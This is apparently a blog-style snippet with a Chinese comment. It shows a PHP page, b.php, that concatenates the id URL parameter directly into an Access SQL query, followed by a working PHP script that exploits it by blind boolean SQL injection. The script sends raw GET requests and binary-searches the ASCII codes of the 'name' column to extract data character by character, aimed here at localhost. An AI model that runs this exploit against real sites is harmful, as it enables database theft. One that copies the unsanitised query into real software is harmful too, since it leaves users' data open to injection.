b.php

<?php
$conn = new com("ADODB.Connection");
$connstr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=". realpath("data.mdb");

$conn->Open($connstr);
$rs = new com("ADODB.RecordSet");
$sql="select * from news where id=".$_GET[id];
$rs->Open($sql,$conn,1,1);
if(! $rs->eof) {
echo "{ok}";
} else{
echo "{no}";
}
?>
存在注射的。但是没有输出结果，只是判断是否存在。

<?php

error_reporting(7);
ini_set('max_execution_time', 0);

function send(){
global $host,$cmd;
//$cmd .= "";
$message = "GET /b.php?id=".$cmd." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Host: $host\r\n";
$message .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);
fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
preg_match('/\{ok\}/', $resp, $pre);
if ($pre) return true;
}

function Binsearch($sql){
global $cmd;
$low="32";
$high="128";
while($low<=$high){
$mid=intval(($low+$high)/2);
$cmd= $sql."=".$mid;
echo "$mid";
if(send()){echo "Lucky\r\n";return $mid;}
$cmd= $sql."<".$mid;
if(send()){
$high=$mid-1;
echo "Bigger\r\n";
}else{
$low=$mid+1;
echo "Smaller\r\n";
}
}
return(-1);
}

$host="127.0.0.1:8080";
$sql="15%20and%20asc(left(name,1))";
echo Binsearch($sql);
?>